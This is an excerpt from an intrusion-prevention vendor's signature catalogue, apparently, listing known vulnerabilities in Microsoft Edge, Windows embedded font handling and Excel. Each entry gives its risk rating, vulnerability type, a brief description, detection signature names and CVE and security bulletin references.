Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0591

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0591
References:
CVE-2019-0591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0591
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0593

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0593
References:
CVE-2019-0593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0593
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0606

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0606
References:
CVE-2019-0606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0606
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0607

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0607
References:
CVE-2019-0607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0607
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0650

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0650
References:
CVE-2019-0650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0650
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0651

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0651
References:
CVE-2019-0651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0651
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0655

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0655
References:
CVE-2019-0655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0655
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Typedarray.sort-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Typedarray.sort-Use-After-Free
References:
CVE-2016-7288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7288
MS16-145
http://technet.microsoft.com/security/bulletin/MS16-145
Back to top

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2017-8605

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a use after free vulnerability in Microsoft Edge. A successful exploitation can allow a remote attacker to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2017-8605
References:
CVE-2017-8605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8605
ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul
Back to top

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0946

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Microsoft Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0946
References:
CVE-2018-0946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0946
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0954

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Microsoft Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0954
References:
CVE-2018-0954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0954
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0995

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018
References:
CVE-2018-0995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0995
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-8123

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Microsoft Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-8123
References:
CVE-2018-8123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8123
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0640

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0640
References:
CVE-2019-0640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0640
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0645

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0645
References:
CVE-2019-0645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0645
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Vulnerability-CVE-2016-3264

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-778-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Input Validation
Description: There exists a vulnerability in Microsoft Edge.
References:
CVE-2016-3264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3264
MS16-085
http://technet.microsoft.com/security/bulletin/MS16-085
Back to top

Microsoft-Embedded-OpenType-EOT-Font-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Microsoft Windows Embedded OpenType (EOT) Font Engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Embedded-OpenType-EOT-Font-Integer-Overflow
References:
CVE-2010-1883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1883
BID-43775
http://www.securityfocus.com/bid/43775
MS10-076
http://technet.microsoft.com/security/bulletin/MS10-076
Back to top

Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow

About this vulnerability: A vulnerability in Microsoft Embedded OpenType Font Engine
Risk: High
First detected in: sgpkg-ips-231-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008
Software: <os>
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Embedded OpenType Font Engine.
Situation: HTTP_SS-Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow
File-Binary_Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow
References:
CVE-2009-0231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231
OSVDB-55842
http://www.osvdb.org/55842
MS09-029
http://technet.microsoft.com/security/bulletin/MS09-029
Back to top

Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Embedded OpenType Font Engine
Risk: High
First detected in: sgpkg-ips-231-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008
Software: <os>
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Embedded OpenType Font Engine.
Situation: HTTP_SS-Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow
File-Binary_Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow
References:
CVE-2009-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0232
MS09-029
http://technet.microsoft.com/security/bulletin/MS09-029
Back to top

Microsoft-Embedded-Web-Font-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Microsoft Windows embedded web font handling
Risk: High
First detected in: sgpkg-ips-54-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the Microsoft Windows embedded web font handling component. The data of the embedded font is defined in an EOT (Embedded Open Type) file. A remote attacker is able to create a malicious EOT file which is refered to by an HTML document. If the user views the document then the malicious EOT file is downloaded and processed on the victim host. This allows the attacker to execute arbitrary code on the victim machine.
Situation: HTTP_Microsoft-Embedded-Font-EOT-File-Reference
E-Mail_BS-Microsoft-Embedded-Font-EOT-File-Reference
File-Binary_Microsoft-Embedded-Font-EOT-File-Reference
File-Text_Microsoft-Embedded-Font-EOT-File-Reference
References:
CVE-2006-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0010
BID-16194
http://www.securityfocus.com/bid/16194
OSVDB-18829
http://www.osvdb.org/18829
MS06-002
http://technet.microsoft.com/security/bulletin/MS06-002
Back to top

Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978

About this vulnerability: An attempt to exploit Excel vulnerability CVE-2011-0978
Risk: Moderate
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel record parsing may lead to code execution
Situation: HTTP_SS-Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978
File-OLE_Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978
References:
CVE-2011-0978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0978
MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021
Back to top

Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990
File-OLE_Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990
References:
CVE-2011-1990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1990
MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072
Back to top

Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Excel. The vulnerability is due to insufficient validation of input values when parsing the Axisparent record from a spreadsheet file. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution
File-OLE_Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution
References:
CVE-2008-3004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3004
BID-30638
http://www.securityfocus.com/bid/30638
MS08-042
http://technet.microsoft.com/security/bulletin/MS08-042
Back to top

Microsoft-Excel-Biff-File-Format-Named-Graph-Record-Parsing-Stack-Overflow

About this vulnerability: A stack overflow vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Excel and Microsoft Excel Viewer. The vulnerability is the result of insufficient boundary checking when parsing a Named Graph Record from native OLE formatted files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: File-OLE_Microsoft-Excel-Named-Graph-Record-Parsing-Stack-Overflow
References:
CVE-2007-0215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0215
BID-23760
http://www.securityfocus.com/bid/23760
OSVDB-34393
http://www.osvdb.org/34393
MS07-023
http://technet.microsoft.com/security/bulletin/MS07-023
Back to top

Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276

About this vulnerability: An attempt to exploit vulnerability in Microsoft Excel detected
Risk: Moderate
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: Vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276
File-TextId_Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276
References:
CVE-2011-1276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1276
OSVDB-72924
http://www.osvdb.org/72924
MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045
Back to top

Microsoft-Excel-Colinfo-Record-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Works
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Microsoft Excel. The flaw is caused by insufficient checks while parsing COLINFO Records in the Excel files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Excel application will terminate or the application will stop responding. This can potentially lead to a loss of data. In a more sophisticated attack, where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-OLE_Microsoft-Excel-Colinfo-Record-Buffer-Overflow
References:
CVE-2006-3875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3875
BID-20391
http://www.securityfocus.com/bid/20391
MS06-059
http://technet.microsoft.com/security/bulletin/MS06-059
Back to top

Microsoft-Excel-Column-Record-Handling-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS
Software: Microsoft Excel
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel. A crafted Excel spreadsheet file (XLS) can be used to terminate the affected product or execute non-privileged arbitary code.
Situation: HTTP_Microsoft-Excel-Column-Record-Handling-Memory-Corruption
File-OLE_Microsoft-Excel-Column-Record-Handling-Memory-Corruption
References:
CVE-2007-0030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0030
BID-21925
http://www.securityfocus.com/bid/21925
OSVDB-31257
http://www.osvdb.org/31257
MS07-002
http://technet.microsoft.com/security/bulletin/MS07-002
Back to top

Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability
File-OLE_Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability
References:
CVE-2011-1989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1989
MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072
Back to top

Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Microsoft Excel
Type: Buffer Overflow
Description: There is a code execution vulnerability in Microsoft Excel. The vulnerability is due to improper parsing of the conditional formatting record from a Excel worksheet file. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution
File-OLE_Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution
References:
CVE-2008-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0117
BID-28170
http://www.securityfocus.com/bid/28170
MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014
Back to top

Microsoft-Excel-Continuefrt12-Record-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Platform: Windows
Software: Microsoft Excel
Type: Buffer Overflow
Description: Improper parsing of ContinueFrt12 records in an XLS document causes a heap buffer overflow in Excel. A successful exploit allows an attacker to execute arbitrary code with the privileges of the target process.
Situation: File-OLE_Microsoft-Excel-Continuefrt12-Record-Parsing-Heap-Buffer-Overflow
References:
CVE-2021-34501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34501
Back to top

Microsoft-Excel-Crafted-Picture-Record-Code-Execution

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel. The flaw is due to improper handling of crafted Excel spreadsheet files. An attacker can persuade the target user to open a malicious Excel spreadsheet to exploit this vulnerability. Successful attack allows for arbitrary code injection and execution with privileges of the currently logged on user. In an attack where arbitrary code is injected and executed on the target system, the behavior of the target depends on the intended function of the malicious code. In an unsuccessful attack, the vulnerable application may terminate as a result of invalid memory access.
Situation: HTTP_SS-Microsoft-Excel-Crafted-Picture-Record-Code-Execution
File-OLE_Microsoft-Excel-Crafted-Picture-Record-Code-Execution
References:
CVE-2009-0100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0100
BID-34413
http://www.securityfocus.com/bid/34413
OSVDB-53665
http://www.osvdb.org/53665
MS09-009
http://technet.microsoft.com/security/bulletin/MS09-009
Back to top

Microsoft-Excel-Crafted-Url-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-71-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Buffer Overflow
Description: Microsoft Excel has a buffer overflow vulnerability in the handling of excessively long strings in link objects. The vulnerability can be exploited by persuading a user to open a specially crafted Excel file and to follow a malicious link, causing a DoS condition terminating all instances of the Microsoft Excel application, and potentially leading to a loss of data or arbitrary code execution with the privileges of the currently logged in user.
Situation: HTTP_Microsoft-Excel-Crafted-Url-Buffer-Overflow
E-Mail_BS-Microsoft-Excel-Crafted-Url-Buffer-Overflow
File-OLE_Microsoft-Excel-Crafted-Url-Buffer-Overflow
References:
CVE-2006-3086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3086
BID-18500
http://www.securityfocus.com/bid/18500
OSVDB-26666
http://www.osvdb.org/26666
MS06-050
http://technet.microsoft.com/security/bulletin/MS06-050
Back to top

Microsoft-Excel-CVE-2016-7262-Security-Feature-Bypass

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Excel detected
Situation: File-TextId_Microsoft-Excel-CVE-2016-7262-Security-Feature-Bypass
References:
CVE-2016-7262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7262
MS16-148
http://technet.microsoft.com/security/bulletin/MS16-148
Back to top

Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980

About this vulnerability: An attempt to exploit Excel vulnerability CVE-2011-0980
Risk: Moderate
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel record parsing may lead to code execution
Situation: HTTP_SS-Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980
File-OLE_Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980
References:
CVE-2011-0980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0980
MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021
Back to top

Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105

About this vulnerability: An attempt to exploit Excel vulnerability CVE-2011-0105
Risk: Moderate
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel record parsing may lead to code execution
Situation: HTTP_SS-Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105
File-OLE_Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105
References:
CVE-2011-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105
MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021
Back to top

Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2002; Microsoft Excel 2004 for Mac; Microsoft Excel 2008 for Mac
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: HTTP_SS-Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264
File-OLE_Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264
References:
CVE-2010-0264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0264
MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017
Back to top

Microsoft-Excel-Embedded-Shockwave-Flash-Object-Code-Execution

About this vulnerability: Flash based code execution vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-71-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: Microsoft Excel has a Flash-based code execution vulnerability. The vulnerability can be exploited by persuading a user to open a specially crafted Excel file containing an embedded Shockwave Flash Object, leading to arbitrary script code execution.
Situation: HTTP_Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution
E-Mail_BS-Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution
File-OLE_Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution
References:
CVE-2006-3014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3014
BID-18583
http://www.securityfocus.com/bid/18583
MS06-069
http://technet.microsoft.com/security/bulletin/MS06-069
Back to top

Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel.
Situation: E-Mail_BS-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
HTTP_SS-Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
File-OLE_Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
References:
CVE-2010-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1249
BID-40527
http://www.securityfocus.com/bid/40527
OSVDB-65232
http://www.osvdb.org/65232
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Excel-File-Handling-Code-Execution-Vulnerability

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is a due to improper parsing of a record of Excel files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Excel-File-Handling-Code-Execution-Vulnerability
File-OLE_Microsoft-Excel-File-Handling-Code-Execution-Vulnerability
References:
CVE-2008-0081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081
BID-27305
http://www.securityfocus.com/bid/27305
MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014
Back to top

Microsoft-Excel-File-Importing-Code-Execution

About this vulnerability: Code execution vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Excel. By persuading a user to open a crafted Excel SYLK document with a vulnerable version of the affected application, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: E-Mail_BS-Microsoft-Excel-File-Importing-Code-Execution
HTTP_SS-Microsoft-Excel-File-Importing-Code-Execution
File-TextId_Microsoft-Excel-File-Importing-Code-Execution
References:
CVE-2008-0112
